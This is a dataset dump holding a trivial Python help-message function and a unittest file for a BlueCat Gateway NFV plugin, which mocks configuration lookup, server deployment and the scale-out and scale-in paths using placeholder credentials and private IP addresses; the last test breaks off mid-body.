| 39.212389 | 126 | 0.723087 | 630 | 4,431 | 4.974603 | 0.238095 | 0.056158 | 0.058073 | 0.049138 | 0.768028 | 0.768028 | 0.768028 | 0.732929 | 0.713784 | 0.655392 | 0 | 0.010332 | 0.169939 | 4,431 | 112 | 127 | 39.5625 | 0.841762 | 0.239675 | 0 | 0.490196 | 0 | 0 | 0.164014 | 0.020778 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137255 | false | 0 | 0.058824 | 0.137255 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
026bc79d255ef34bb87d355a51c148c1677b7ee2 | 48 | py | Python | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null | custommsg/helpmsg.py | IDoMaths/RuneFarmer | 1c05f84eea4b8c7791856ac23822ccf632e9af1b | [
"MIT"
] | null | null | null |
def gethelpmsg():
    return "sample help message"
| 24 | 30 | 0.75 | 6 | 48 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 30 | 24 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0.387755 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7
5a35215a16ab798bfb43b559ce1d24c6b3ff1656 | 72,792 | py | Python | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null | tests/test_gateway_nfv_management.py | haihuynh-bluecat/gateway_nfv_plugin | 90019f86ad09a864198a74d7cdad4437d98bbf38 | [
"Apache-2.0"
] | null | null | null |
# Copyright 2019 BlueCat Networks (USA) Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=missing-docstring, missing-final-newline
import unittest
import sys
import context
from unittest import mock # pylint: disable=import-error
sys.modules["flask"] = mock.Mock()
sys.modules["suds"] = mock.Mock()
class TestGatewayNFVManagement(unittest.TestCase):
"""
Test Gateway NFV Plugin Management
"""
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configurations')
def test_get_configuration_id(self, mock_get_configuration):
# pylint: disable=missing-docstring
configuration_list = [[124707, 'DemoConfig']]
configuration_name = "DemoConfig"
mock_get_configuration.return_value = configuration_list
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_configuration_id # pylint:disable=import-error
actual = get_configuration_id(configuration_name)
expected = 124707
self.assertEqual(expected, actual)
mock_get_configuration.assert_called_once_with()
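The stacked `@mock.patch` decorators used throughout this class apply bottom-up: the decorator closest to the test function supplies the first mock parameter. A standalone sketch of the ordering rule (`Calc` is a made-up class, not from the plugin):

```python
from unittest import mock

class Calc:
    def a(self):
        return 1
    def b(self):
        return 2

@mock.patch.object(Calc, "b", return_value=20)   # outermost -> second parameter
@mock.patch.object(Calc, "a", return_value=10)   # innermost -> first parameter
def demo(mock_a, mock_b):
    c = Calc()
    return c.a(), c.b()

print(demo())  # (10, 20)
```

Matching parameter order to decorator order (bottom decorator first) is what keeps the long signatures in tests like `test_scale_out_successfully` correct.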
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configurations')
def test_get_configuration_id_none(self, mock_get_configuration):
# pylint: disable=missing-docstring
configuration_list = [["", "DemoConfig"]]
configuration_name = "DemoConfig"
mock_get_configuration.return_value = configuration_list
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_configuration_id # pylint:disable=import-error
actual = get_configuration_id(configuration_name)
expected = None
self.assertEqual(expected, actual)
mock_get_configuration.assert_called_once_with()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
def test_scale_out_with_not_config_id(self, mock_get_configuration_id, mock_jsonify):
# pylint: disable=missing-docstring
config_id = None
data = ""
mock_get_configuration_id.return_value = config_id
jsonify = {"status": "Failed",
"message": "Configuration id not found!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
mock_get_configuration_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_not_available_server(self, mock_read_config_json_file, mock_get_configuration_id, mock_jsonify, mock_is_check_available_server):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = False
mock_is_check_available_server.return_value = avail_server
jsonify = {"status": "Failed", "message": "No available server ip!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_exception_metadata(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
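`assertRaises(Exception)`, as used here, passes for any exception at all, so an unrelated setup error would also satisfy it. Where the expected error type is known, `assertRaisesRegex` with a concrete class is stricter; a standalone illustration (the test name and message are invented):

```python
import unittest

class DemoRaises(unittest.TestCase):
    def test_specific_exception(self):
        # Pin both the exception type and part of its message, so only
        # the intended failure mode makes the test pass.
        with self.assertRaisesRegex(ValueError, "invalid ip"):
            raise ValueError("invalid ip address: 999.1.1.1")

suite = unittest.defaultTestLoader.loadTestsFromTestCase(DemoRaises)
result = unittest.TextTestRunner(verbosity=0).run(suite)
print(result.wasSuccessful())  # True
```

The bare `Exception` form in these tests still verifies the error path fires, but narrowing the type would catch regressions where `scale_out` starts failing for a different reason.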
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_exception_service_server_netmask(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "nhii",
"service_server_netmask": 555,
"service_server_ipv4": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_exception_service_ipv6(self, mock_read_config_json_file, mock_get_configuration_id,
mock_is_check_available_server, mock_process_password, mock_g):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "aaa",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": None,
"service_server_ipv6": None
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
with self.assertRaises(Exception):
scale_out(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_none_role_id(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": True,
"dns_view_names": "view",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = 123
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_none_server_cap_profile(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": None,
"dns_view_names": "view",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = None
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_with_dns_view(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server, mock_add_server,
mock_create_deployment_roles, mock_process_password, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "can_scale_in=True",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": None,
"dns_view_names": "aaa",
"server_deploy_role": "server"
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_properties = "nhiii"
mock_process_password.return_value = server_properties
server_id = 334498
mock_add_server.return_value = server_id
role_id = None
mock_create_deployment_roles.return_value = role_id
jsonify = {"status": "Failed", "message": "Create deployment role failed"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.create_deployment_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.add_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.is_check_available_server')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_out_successfully(self, mock_read_config_json_file, mock_get_configuration_id, mock_is_check_available_server,
mock_add_server, mock_create_deployment_roles, mock_deploy_server_config,
mock_wait_for_deployment, mock_process_password, mock_memcached_nfv, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"mgnt_server_ip": "192.168.88.169",
"metadata": "aaa",
"service_server_netmask": 24,
"service_server_ipv4": "1.1.1.1",
"service_server_v6_prefix": "nhii",
"service_server_ipv6": "11.11.11.11",
"server_name": "bdds"
}
data_config = {
"server_ssh_username": "root",
"server_ssh_password": "123456",
"bam_config_name": "bam54",
"mgnt_server_ip": "192.168.88.169",
"server_deployment_password": "123456",
"server_cap_profile": True,
"dns_view_names": "view",
"server_deploy_role": "server",
"anycast_config": True,
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": 11211,
}
mock_read_config_json_file.return_value = data_config
config_id = 102728
mock_get_configuration_id.return_value = config_id
avail_server = True
mock_is_check_available_server.return_value = avail_server
server_id = 334498
server_properties = "nhiii"
mock_process_password.return_value = server_properties
mock_add_server.return_value = server_id
role_id = 111
mock_create_deployment_roles.return_value = role_id
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = True
mock_wait_for_deployment.return_value = deploy_status
mem_nfv = []
mock_memcached_nfv.return_value = mem_nfv
jsonify = {"status": "Successful", "message": "Scale out successfully", "error": ""}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_out # pylint:disable=import-error
actual = scale_out(data)
expect = (jsonify, 500)
self.assertEqual(expect, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
def test_scale_in_with_not_config_id(self, mock_get_configuration_id, mock_jsonify):
# pylint: disable=missing-docstring
config_id = None
data = ""
mock_get_configuration_id.return_value = config_id
jsonify = {"status": "Failed",
"message": "Configuration id not found!"}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
actual = scale_in(data)
expect = (jsonify, 404)
self.assertEqual(expect, actual)
mock_get_configuration_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_remove_roles_false(self, mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
mock_delete_server_roles.return_value = remove_roles
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
        with self.assertRaises(Exception):
            scale_in(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_with_default_interface_address_not_correct_position(self, mock_get_server_by_name, mock_delete_server_roles,
mock_deploy_server_config, mock_wait_for_deployment, mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
        # Corrupt the properties string so defaultInterfaceAddress is no longer in the expected position
        server['properties'] = server['properties'].replace(
            'defaultInterfaceAddress', 'nhiii', 1)
mock_delete_server_roles.return_value = remove_roles
deploy_server = True
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
        with self.assertRaises(Exception):
            scale_in(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
def test_scale_in_failed_with_deploy_server_false(self, mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
mock_delete_server_roles.return_value = remove_roles
deploy_server = False
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
delete_server = True
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
        with self.assertRaises(Exception):
            scale_in(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.jsonify')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.MemcachedNFV')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.wait_for_deployment')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.deploy_server_config')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_server_roles')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_by_name')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_configuration_id')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_scale_in_failed_with_delete_server_false(self, mock_read_config_json_file, mock_get_configuration_id,
mock_get_server_by_name, mock_delete_server_roles, mock_deploy_server_config, mock_wait_for_deployment,
mock_delete_entity, mock_memcache_nfv, mock_g, mock_jsonify):
# pylint: disable=missing-docstring
data = {
"metadata": "",
"service_server_netmask": "",
"service_server_v6_prefix": "",
"service_server_ipv6": "",
"server_cap_profile": "",
"server_name": "bdds169",
"server_deploy_role": "",
"dns_view_names": "",
"bam": [
{
"ip": "192.168.88.54",
"name": "DNS_999_BAM_0001"
}
],
"memcached_host": "192.168.88.170",
"memcached_port": "11211"
}
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
mock_get_server_by_name.return_value = server
remove_roles = False
mock_delete_server_roles.return_value = remove_roles
deploy_server = False
mock_deploy_server_config.return_value = deploy_server
deploy_status = 1
mock_wait_for_deployment.return_value = deploy_status
